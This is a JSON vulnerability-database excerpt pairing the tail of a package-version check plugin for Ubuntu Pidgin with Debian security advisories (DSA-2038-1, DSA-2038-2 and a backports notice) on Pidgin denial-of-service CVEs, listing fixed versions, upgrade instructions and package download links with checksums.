(ubuntu_check(osver:\"8.10\", pkgname:\"libpurple0\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin\", pkgver:\"1:2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin-data\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin-dbg\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"pidgin-dev\", pkgver:\"2.5.2-0ubuntu1.7\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"finch\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"finch-dev\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpurple-bin\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpurple-dev\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"libpurple0\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin\", pkgver:\"1:2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin-data\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin-dbg\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"pidgin-dev\", pkgver:\"2.5.5-1ubuntu8.6\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"finch\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"finch-dev\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpurple-bin\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpurple-dev\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"libpurple0\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"pidgin\", pkgver:\"1:2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"pidgin-data\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"pidgin-dbg\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\nif (ubuntu_check(osver:\"9.10\", pkgname:\"pidgin-dev\", pkgver:\"2.6.2-1ubuntu7.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-dev / gaim / libpurple-bin / libpurple-dev / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:14:04", "references": [], "affectedPackage": [], "description": "Jan Wagner uploaded a new package for pidgin which fixed the following\nsecurity problem:\n\nCVE-2010-0277[2] and Debian Bug #566775[3]\n\n It was discovered that that slp.c in the MSN protocol plugin in libpurple in \n Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers to cause a denial of \n service (memory corruption) or possibly have unspecified other impact via \n unknown vectors, a different issue than CVE-2010-0013.\n\nCVE-2010-0420[4]\n\n Fixes a remote Finch XMPP crash.\n\nCVE-2010-0423[5]\n\n Fixes a remote smiley freeze/CPU pegging DoS.\n\nFor the sid distribution the problem has been fixed in\nversion 2.6.6-1.\n\nUpgrade instructions\n---------------------\n\nIf you don&#x27;t use pinning (see [1]) you have to update pidgin\nmanually via &quot;apt-get -t lenny-backports install pidgin&quot;.\n\nWe recommend to pin the backports repository to 200 so that new versions\nof installed backports will be installed automatically:\n\nPackage: *\nPin: release a=lenny-backports\nPin-Priority: 200\n\n[1] &lt;http://backports.org/dokuwiki/doku.php?id=instructions&gt;\n[2] http://security-tracker.debian.org/tracker/CVE-2010-0277\n[3] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=566775\n[4] http://security-tracker.debian.org/tracker/CVE-2010-0420\n[5] http://security-tracker.debian.org/tracker/CVE-2010-0423\n", "edition": 1, "reporter": "Debian", "published": "2010-02-18T22:27:39", "title": "[Backports-security-announce] Security Update for pidgin", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:04", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2010-02-18T22:27:39", "id": "DEBIAN:9869F46A42CB60CD086621054B28E8AA:B48BC", "href": "https://lists.debian.org/debian-backports-announce/2010/debian-backports-announce-201002/msg00005.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-16T22:14:13", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny7", "arch": "all", "packageFilename": "pidgin-dbg_2.4.3-4lenny7_all.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny7", "arch": "all", "packageFilename": "libpurple-dev_2.4.3-4lenny7_all.deb", "packageName": "libpurple-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny7", "arch": "all", "packageFilename": "finch-dev_2.4.3-4lenny7_all.deb", "packageName": "finch-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny7", "arch": "all", "packageFilename": "libpurple0_2.4.3-4lenny7_all.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny7", "arch": "all", "packageFilename": "pidgin-dev_2.4.3-4lenny7_all.deb", "packageName": "pidgin-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny7", "arch": "all", "packageFilename": "finch_2.4.3-4lenny7_all.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny7", "arch": "all", "packageFilename": "pidgin_2.4.3-4lenny7_all.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny7", "arch": "all", "packageFilename": "pidgin-data_2.4.3-4lenny7_all.deb", "packageName": "pidgin-data", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny7", "arch": "all", "packageFilename": "libpurple-bin_2.4.3-4lenny7_all.deb", "packageName": "libpurple-bin", "operator": "lt"}], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2038-2 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nMay 17, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : pidgin\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2010-0420 CVE-2010-0423\nDebian Bug : 566775 579601\n\nThe packages for Pidgin released as DSA 2038-1 had a regression, as they\nunintentionally disabled the Zephyr instant messaging protocol. This\nupdate restores Zephyr functionality. For reference the original\nadvisory text below.\n\nSeveral remote vulnerabilities have been discovered in Pidgin, a multi\nprotocol instant messaging client. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2010-0420\n\n Crafted nicknames in the XMPP protocol can crash Pidgin remotely.\n\nCVE-2010-0423\n\n Remote contacts may send too many custom smilies, crashing Pidgin.\n\nSince a few months, Microsoft&#x27;s servers for MSN have changed the protocol,\nmaking Pidgin non-functional for use with MSN. It is not feasible to port\nthese changes to the version of Pidgin in Debian Lenny. This update\nformalises that situation by disabling the protocol in the client. Users\nof the MSN protocol are advised to use the version of Pidgin in the\nrepositories of www.backports.org.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.4.3-4lenny7.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.6.6-1.\n\nWe recommend that you upgrade your pidgin package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3.orig.tar.gz\n Size/MD5 checksum: 13123610 d0e0bd218fbc67df8b2eca2f21fcd427\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7.diff.gz\n Size/MD5 checksum: 72195 fe0a9dd9d55d642dc77c4f7c678522c8\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7.dsc\n Size/MD5 checksum: 1784 300f72738867fcd326db7f836ac47d67\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-data_2.4.3-4lenny7_all.deb\n Size/MD5 checksum: 7019174 3d1e4508e5543441a5d04a31f03b0979\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dev_2.4.3-4lenny7_all.deb\n Size/MD5 checksum: 193842 b2c75fc6891adad16add69903ce9762d\n http://security.debian.org/pool/updates/main/p/pidgin/finch-dev_2.4.3-4lenny7_all.deb\n Size/MD5 checksum: 159766 5bb66c4efe6c67eeb33297738799a831\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-bin_2.4.3-4lenny7_all.deb\n Size/MD5 checksum: 133930 c25806d1d9a07c49c5a3b2fd0b83964c\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-dev_2.4.3-4lenny7_all.deb\n Size/MD5 checksum: 277224 c169cf3a82bb6a0faf1d285a7377b695\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny7_alpha.deb\n Size/MD5 checksum: 1501864 9aa23188e1610834d035e88fd30308b8\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny7_alpha.deb\n Size/MD5 checksum: 369772 a8eb912226cf47f5f74892f0b1110cc4\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7_alpha.deb\n Size/MD5 checksum: 776646 bf0f80658559ab3e4c22356dd47d809d\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny7_alpha.deb\n Size/MD5 checksum: 4989752 30e054746fff6d56a9e3b288039ff6c9\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7_amd64.deb\n Size/MD5 checksum: 727950 57554918978a95ea250a8494c9aab433\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny7_amd64.deb\n Size/MD5 checksum: 1429960 2779007da91fe74a1304f3263cd7d53e\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny7_amd64.deb\n Size/MD5 checksum: 348100 d01043df40ed1861c63043b44289984d\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny7_amd64.deb\n Size/MD5 checksum: 5101892 af2ea1456eb390f3930e6164108a9c7f\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny7_arm.deb\n Size/MD5 checksum: 316624 290e5d8fa14bcc09dde3ce6d326d84bd\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7_arm.deb\n Size/MD5 checksum: 657416 1997d30109a1c86c6c8979ff2e0511ee\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny7_arm.deb\n Size/MD5 checksum: 4835872 9f2aaef6679c3b2e27a73240799a7ffa\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny7_arm.deb\n Size/MD5 checksum: 1239516 640fd3ff6c91ac45820581df86965af8\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7_armel.deb\n Size/MD5 checksum: 668000 b0bc286a8e2d74a033ac69b5ed234e6e\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny7_armel.deb\n Size/MD5 checksum: 1243880 88c529b8e9178969c3a3a13e1a8e3230\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny7_armel.deb\n Size/MD5 checksum: 319962 72d956d2c3b6b04dc0aed07e6d99e944\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny7_armel.deb\n Size/MD5 checksum: 4851712 6134571c92b5495489555c01fc4a6d51\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny7_hppa.deb\n Size/MD5 checksum: 1522820 023def8c7a3051e1d15030347c99e99d\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7_hppa.deb\n Size/MD5 checksum: 752858 43129b10ef60136293b349614a662972\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny7_hppa.deb\n Size/MD5 checksum: 4943738 9cc7aee5d06445b07cceb81efa3ba30d\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny7_hppa.deb\n Size/MD5 checksum: 360748 353f5caf6903c89a3bdd482dd6a520e6\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7_i386.deb\n Size/MD5 checksum: 681390 82c10195fb937a47a113940fa93dbdb5\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny7_i386.deb\n Size/MD5 checksum: 4837960 416ddcf7b18e7b2a474fa56731a93f7b\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny7_i386.deb\n Size/MD5 checksum: 326994 06bb2fefdc9ea9dce38a5481f33dcdf5\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny7_i386.deb\n Size/MD5 checksum: 1317496 9218b0b46b8716781d80133e77194170\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny7_ia64.deb\n Size/MD5 checksum: 1821990 87c03b5c08d97b8c8ae2a573ecd3cecb\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny7_ia64.deb\n Size/MD5 checksum: 435010 22dee93a1714c2654ec0dfaa8705cfe2\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny7_ia64.deb\n Size/MD5 checksum: 4706272 6e0b0c3291dceb229522e1de229e3361\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7_ia64.deb\n Size/MD5 checksum: 948766 ddf4cff0ac25735e5d18edcbeb970bf4\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny7_mips.deb\n Size/MD5 checksum: 1117676 eb4a88cc934233faafebdcebc1171bc3\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny7_mips.deb\n Size/MD5 checksum: 319576 4ad4d7a878a0d5daaff189da549c4638\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny7_mips.deb\n Size/MD5 checksum: 5087780 9ebfc36f1749b61ab7a4fe70d0770f88\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7_mips.deb\n Size/MD5 checksum: 654936 d63bd6a67138596ef85b7a3259fceee7\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny7_mipsel.deb\n Size/MD5 checksum: 4999390 ad6121a42731cb360d76b6fe67180924\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny7_mipsel.deb\n Size/MD5 checksum: 318598 8b0b8f40209b828098f6ed000c517f65\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny7_mipsel.deb\n Size/MD5 checksum: 1108760 4e9f79966b7fa0df677a1a5952488e62\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7_mipsel.deb\n Size/MD5 checksum: 651474 7b24d4210caaf4d27b9b3863393bffd6\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny7_powerpc.deb\n Size/MD5 checksum: 1470622 c51b3531cc31005e58feac25f8606bd3\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny7_powerpc.deb\n Size/MD5 checksum: 5052846 986c8a8ac0ccd3399393bceda957656f\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny7_powerpc.deb\n Size/MD5 checksum: 362770 f00c1a33b3598333dfc4ae9d61bf1d83\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7_powerpc.deb\n Size/MD5 checksum: 755104 ae81b0387a32b162fb30ac425dc4ad43\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny7_s390.deb\n Size/MD5 checksum: 5014182 c093e4c7e6e3b6132a8145a35e88c3fb\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny7_s390.deb\n Size/MD5 checksum: 359260 919eb5ad29cb280d84ef36b2c45273b9\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny7_s390.deb\n Size/MD5 checksum: 1351418 a94314c09692e3a9350b8bd1684843bc\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7_s390.deb\n Size/MD5 checksum: 718026 52121ab6cf237545c29f10826b98894b\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny7_sparc.deb\n Size/MD5 checksum: 4639296 f38822c989d40d124d82abc53ae42d38\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny7_sparc.deb\n Size/MD5 checksum: 328662 f5fe4eb9c81b2aa8d335b983288902dd\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny7_sparc.deb\n Size/MD5 checksum: 683246 d37d198e8bb1d5c3f98521dcc0a43c24\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny7_sparc.deb\n Size/MD5 checksum: 1323820 54026420c5be2e153e7a8ffbcb70b5cd\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "edition": 1, "reporter": "Debian", "published": "2010-05-17T20:38:16", "title": "[SECURITY] [DSA 2038-2] New pidgin packages fix regression", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:13", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423"], "modified": "2010-05-17T20:38:16", "id": "DEBIAN:DSA-2038-2:EA613", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00089.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-16T22:14:51", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "libpurple0_2.4.3-4lenny6_all.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "finch-dev_2.4.3-4lenny6_all.deb", "packageName": "finch-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "pidgin-dev_2.4.3-4lenny6_all.deb", "packageName": "pidgin-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "libpurple-dev_2.4.3-4lenny6_all.deb", "packageName": "libpurple-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "pidgin-dbg_2.4.3-4lenny6_all.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "finch_2.4.3-4lenny6_all.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "pidgin_2.4.3-4lenny6_all.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "pidgin-data_2.4.3-4lenny6_all.deb", "packageName": "pidgin-data", "operator": "lt"}, {"OS": "Debian", "OSVersion": "5", "packageVersion": "2.4.3-4lenny6", "arch": "all", "packageFilename": "libpurple-bin_2.4.3-4lenny6_all.deb", "packageName": "libpurple-bin", "operator": "lt"}], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2038-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nApril 18, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : pidgin\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2010-0420 CVE-2010-0423\nDebian Bug : 566775\n\nSeveral remote vulnerabilities have been discovered in Pidgin, a multi\nprotocol instant messaging client. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2010-0420\n\n\tCrafted nicknames in the XMPP protocol can crash Pidgin remotely.\n\nCVE-2010-0423\n\n\tRemote contacts may send too many custom smilies, crashing Pidgin.\n\nSince a few months, Microsoft&#x27;s servers for MSN have changed the protocol,\nmaking Pidgin non-functional for use with MSN. It is not feasible to port\nthese changes to the version of Pidgin in Debian Lenny. This update\nformalises that situation by disabling the protocol in the client. Users\nof the MSN protocol are advised to use the version of Pidgin in the\nrepositories of www.backports.org.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 2.4.3-4lenny6.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.6.6-1.\n\nWe recommend that you upgrade your pidgin package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3.orig.tar.gz\n Size/MD5 checksum: 13123610 d0e0bd218fbc67df8b2eca2f21fcd427\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6.dsc\n Size/MD5 checksum: 1784 f640f8119ef901c7be009232c6dfee05\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6.diff.gz\n Size/MD5 checksum: 72144 85217de41bcd069748eb441886cdfab9\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-data_2.4.3-4lenny6_all.deb\n Size/MD5 checksum: 7019074 1c79c0da4c115e2699d577b957c4e541\n http://security.debian.org/pool/updates/main/p/pidgin/finch-dev_2.4.3-4lenny6_all.deb\n Size/MD5 checksum: 159726 c657bace836fb1d4f3c04c57bdcd7e19\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-bin_2.4.3-4lenny6_all.deb\n Size/MD5 checksum: 133894 49e2b54dcad5a2b40705478118da2d72\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple-dev_2.4.3-4lenny6_all.deb\n Size/MD5 checksum: 277220 9517eadf780382575efcd57ba9dc308b\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dev_2.4.3-4lenny6_all.deb\n Size/MD5 checksum: 193802 b05666d23964d0d28646dc49a85de940\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny6_alpha.deb\n Size/MD5 checksum: 1477324 c6c9e6753f98159748b9e0116bb40df3\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6_alpha.deb\n Size/MD5 checksum: 776550 1334935aee6756fdc1b6e1702cabe0b3\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny6_alpha.deb\n Size/MD5 checksum: 369734 f54c236b4aa7e94d33da983f042bd82b\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny6_alpha.deb\n Size/MD5 checksum: 4952616 ac34a66c4b19a7dd23b1fa0240c07f97\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6_amd64.deb\n Size/MD5 checksum: 727918 e6447c0efc4f5c490bc806f00840b075\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny6_amd64.deb\n Size/MD5 checksum: 1406192 68711767e43c6a0722b8b4d5ed59843a\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny6_amd64.deb\n Size/MD5 checksum: 5067988 c430e8ff4e8b13830c71da4f6948a4f6\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny6_amd64.deb\n Size/MD5 checksum: 348062 042092eae5df409b1b39ae96a6a5b856\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny6_arm.deb\n Size/MD5 checksum: 1217972 2b2879660723d31097c9a535e14c177d\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6_arm.deb\n Size/MD5 checksum: 657362 27313370246e22f31b6439981062dda7\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny6_arm.deb\n Size/MD5 checksum: 316578 36a170a849ca166bcfe9b457f85b9cdb\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny6_arm.deb\n Size/MD5 checksum: 4799502 e4689175bb1d17cb942ed50c7d091315\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6_armel.deb\n Size/MD5 checksum: 668088 714b556255126c810659f203ffb93db1\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny6_armel.deb\n Size/MD5 checksum: 1221012 bbcb58abd9f04c1ba2df16bfce74e29c\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny6_armel.deb\n Size/MD5 checksum: 319790 b7c9ae4c8cfe107744523c44926375a4\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny6_armel.deb\n Size/MD5 checksum: 4821838 ca27cf7101ca23de2ab36cd0c21360d0\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny6_hppa.deb\n Size/MD5 checksum: 1495046 d445e1cb5e3500fc9970b1099ba14227\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny6_hppa.deb\n Size/MD5 checksum: 754250 64d22a1f7c7b9c920360f325749ab0fe\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny6_hppa.deb\n Size/MD5 checksum: 361568 d77edf95828aec4d0347f548e0b0a108\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny6_hppa.deb\n Size/MD5 checksum: 4906668 1208501055cffef75023543a72c956ce\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny6_i386.deb\n Size/MD5 checksum: 4809696 f6df7ed8178ad450886c4d19284e1c04\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny6_i386.deb\n Size/MD5 checksum: 326412 fb3dff6c0627b67e9710630906c770a9\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny6_i386.deb\n Size/MD5 checksum: 1290792 b0eaca04079ad13798d350ec18ad41b5\n 